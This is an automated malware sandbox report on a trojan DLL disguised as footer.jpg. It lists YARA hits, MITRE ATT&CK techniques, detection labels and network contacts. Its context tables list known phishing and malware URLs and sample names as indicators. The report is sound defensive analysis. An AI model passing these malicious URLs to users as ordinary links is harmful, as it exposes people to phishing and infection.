Source: Yara match	File source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
footer.jpg.dll	12%	ReversingLabs	DOS.Trojan.Wacatac
footer.jpg.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.regsvr32.exe.4870000.3.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
1.2.regsvr32.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
ocsp.sca1b.amazontrust.com	0%	Virustotal	Browse
img.img-taboola.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&bhid=60140e93c5b18a0414cccba8&a	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	184.30.24.22	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
ocsp.sca1b.amazontrust.com	143.204.15.36	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	184.30.24.22	true	false		high
lg3.media.net	184.30.24.22	true	false		high
geolocation.onetrust.com	104.20.185.68	true	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	false	1%, Virustotal, Browse	unknown
cvision.media.net	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.4.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://searchads.msn.net/.cfm?&&kp=1&	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.msn.com/de-ch/news/other/mordprozess-in-meilen-die-verteidigerin-will-einen-vollumf%c3%a	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehpz	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/news/other/corona-hinterl%c3%a4sst-tiefe-spuren-unispital-z%c3%bcrich-schr	de-ch[1].htm.4.dr	false		high
http://www.amazon.com/	msapplication.xml.3.dr	false		high
http://www.symantec.com	footer.jpg.dll	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.4.dr	false		high
http://www.twitter.com/	msapplication.xml5.3.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.4.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/er-hat-uns-zuerst-provoziert-erst-dann-schlug-ich-ihn/ar-BB1dxy	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/bub-12-prallt-mit-velo-in-auto-und-wird-schwer-verletzt/ar-BB1d	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.4.dr	false		high
http://www.reddit.com/	msapplication.xml4.3.dr	false		high
https://www.msn.com/de-ch/news/other/t%c3%a4ter-ist-gest%c3%a4ndig-und-sagt-er-sei-provoziert-worden	de-ch[1].htm.4.dr	false		high
https://www.skype.com/	de-ch[1].htm.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.4.dr	false		high
http://www.nytimes.com/	msapplication.xml3.3.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://popup.taboola.com/german	auction[1].htm.4.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.4.dr	false		high
https://twitter.com/	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.4.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de	de-ch[1].htm.4.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.4.dr	false		high
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/#qt=mru	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap	auction[1].htm.4.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/news/other/weshalb-corona-das-bev%c3%b6lkerungswachstum-im-kanton-z%c3%bcr	de-ch[1].htm.4.dr	false		high
https://www.msn.com?form=MY01O4&OCID=MY01O4	de-ch[1].htm.4.dr	false		high
https://support.skype.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=	de-ch[1].htm.4.dr	false		high
http://www.youtube.com/	msapplication.xml7.3.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.4.dr	false		high
https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656	de-ch[1].htm.4.dr	false		high
http://www.wikipedia.com/	msapplication.xml6.3.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http	de-ch[1].htm.4.dr	false		high
https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&bhid=60140e93c5b18a0414cccba8&a	de-ch[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm	de-ch[1].htm.4.dr	false		high
http://www.live.com/	msapplication.xml2.3.dr	false		high
https://www.msn.com/de-ch/news/other/fcz-chaot-nach-brutaler-schl%c3%a4gerei-vor-gericht-nicht-das-e	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://login.skype.com/login/oauth/microsoft?client_id=738133	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/news/other/juso-reicht-initiative-f%c3%bcr-stadtz%c3%bcrcher-gratis-%c3%b6	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/news/other/attacke-am-stadelhofen-sorgt-f%c3%bcr-etliche-hasskommentare/ar	de-ch[1].htm.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.185.68	unknown	United States	13335	CLOUDFLARENETUS	false
143.204.15.36	unknown	United States	16509	AMAZON-02US	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	350960
Start date:	10.02.2021
Start time:	07:59:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	footer.jpg.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.winDLL@13/138@10/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 79.8% (good quality ratio 77.1%) Quality average: 80.7% Quality standard deviation: 27.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 13.88.21.125, 13.64.90.137, 88.221.62.148, 131.253.33.203, 204.79.197.200, 13.107.21.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 184.30.24.22, 51.104.146.109, 92.122.213.194, 92.122.213.247, 152.199.19.161, 52.155.217.156, 20.54.26.129, 8.248.135.254, 67.27.234.126, 8.248.139.254, 67.26.73.254, 8.248.115.254 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a-0003.dc-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.20.185.68	ct.dll	Get hash	malicious	Browse
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse
	header.dll	Get hash	malicious	Browse
	A6C8E866.xlsx	Get hash	malicious	Browse
	A6C8E866.xlsx	Get hash	malicious	Browse
	usd2.dll	Get hash	malicious	Browse
	ACH PAYMENT REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse
	https://atacadaodocompensado.com.br/office356.com-RD163	Get hash	malicious	Browse
	http://free.atozmanuals.com	Get hash	malicious	Browse
	https://splendideventsllc.org/Banco/	Get hash	malicious	Browse
	https://splendideventsllc.org/Banco/	Get hash	malicious	Browse
	https://micrrosoftonline13392123112a.typeform.com/to/y7uCHr2N	Get hash	malicious	Browse
	http://www.greaudstudio.com/docs/fgn/m8jklv4.dll	Get hash	malicious	Browse
	http://www.mmsend19.com/link.cfm?r=oa7eM9ij_RBON-2v1T88Zg~~&pe=j0r_9ysA6YUbQvHrDWJvh4Gx3YMu9AdRMZEN44LMtLmQjQ0-TtHHHXpzASqyDmEe5cSY4BozMo4XVY8-hiIbYw~~&t=Lwe7ivUhPR1MQND0QW-Bgw~~	Get hash	malicious	Browse
	http://kikicustomwigs.com/inefficient.php	Get hash	malicious	Browse
	https://quip.com/bsalAnQMfvNm	Get hash	malicious	Browse
	https://quip.com/bsalAnQMfvNm	Get hash	malicious	Browse
	https://0fficefax365.quip.com/FENkAKwe58Ee	Get hash	malicious	Browse
	238oHn4fAA.html	Get hash	malicious	Browse
	https://antwandale.buzz/FBG/	Get hash	malicious	Browse
143.204.15.36	ph0t0.jpg.dll	Get hash	malicious	Browse
	0pz1on1.dll	Get hash	malicious	Browse
	Where are the female CEOs.docx	Get hash	malicious	Browse
	https://www.jottacloud.com/s/192d9a10b7288404ad1a42236e9c9967aed	Get hash	malicious	Browse
	https://secure.adobecloudshare.ga/share/Kw0FfR8HBn96bAh2BDSZgfAMGBgRmaiw1KS0sNUwBAQVjbmZzbyYSC0FVQkc2BNTwUNDU9IFtVcXQray4uIT88P052BXkABPDsoNi47JFwQclg2/?office=quanvo@deloitte.com	Get hash	malicious	Browse
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tls13.taboola.map.fastly.net	acr1.dll	Get hash	malicious	Browse	151.101.1.44
	TRIGANOcr.dll	Get hash	malicious	Browse	151.101.1.44
	ct.dll	Get hash	malicious	Browse	151.101.1.44
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	151.101.1.44
	BullGuard.dll	Get hash	malicious	Browse	151.101.1.44
	Jidert.dll	Get hash	malicious	Browse	151.101.1.44
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	151.101.1.44
	header[1].jpg.dll	Get hash	malicious	Browse	151.101.1.44
	header.dll	Get hash	malicious	Browse	151.101.1.44
	SimpleAudio.dll	Get hash	malicious	Browse	151.101.1.44
	cSPuZxa7I4.dll	Get hash	malicious	Browse	151.101.1.44
	umAuo1QklZ.dll	Get hash	malicious	Browse	151.101.1.44
	UGPK60taH6.dll	Get hash	malicious	Browse	151.101.1.44
	usd2.dll	Get hash	malicious	Browse	151.101.1.44
	usd2.dll	Get hash	malicious	Browse	151.101.1.44
	595989.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisF00BCCFBF4BA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.f4e794908d8d8093.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis2EB570BBBAA8.dll	Get hash	malicious	Browse	151.101.1.44
	33ffr.dll	Get hash	malicious	Browse	151.101.1.44
contextual.media.net	acr1.dll	Get hash	malicious	Browse	2.18.68.31
	TRIGANOcr.dll	Get hash	malicious	Browse	2.18.68.31
	ct.dll	Get hash	malicious	Browse	104.84.56.24
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	2.18.68.31
	BullGuard.dll	Get hash	malicious	Browse	2.18.68.31
	Jidert.dll	Get hash	malicious	Browse	184.30.24.22
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	104.84.56.24
	header[1].jpg.dll	Get hash	malicious	Browse	104.76.200.23
	header.dll	Get hash	malicious	Browse	92.122.146.68
	SimpleAudio.dll	Get hash	malicious	Browse	2.20.86.97
	cSPuZxa7I4.dll	Get hash	malicious	Browse	23.210.250.97
	umAuo1QklZ.dll	Get hash	malicious	Browse	92.122.146.68
	UGPK60taH6.dll	Get hash	malicious	Browse	23.210.250.97
	usd2.dll	Get hash	malicious	Browse	92.122.146.68
	usd2.dll	Get hash	malicious	Browse	92.122.146.68
	595989.dll	Get hash	malicious	Browse	2.18.68.31
	SecuriteInfo.com.ArtemisF00BCCFBF4BA.dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.f4e794908d8d8093.dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Artemis2EB570BBBAA8.dll	Get hash	malicious	Browse	92.122.253.103
	33ffr.dll	Get hash	malicious	Browse	2.18.68.31

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	wEcncyxrEe	Get hash	malicious	Browse	54.98.132.28
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.532835de00afd90c.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.d8f17bf7de7183ed.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.532835de00afd90c.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.91264688dd8534b0.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.213e13e37a770a54.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.3edc6cbe783b623c.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.d8f17bf7de7183ed.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Artemis018048AA9219.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.27c0afbd5465ecc9.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.Generic.mg.533f1e8ba6b430aa.exe	Get hash	malicious	Browse	52.37.89.225
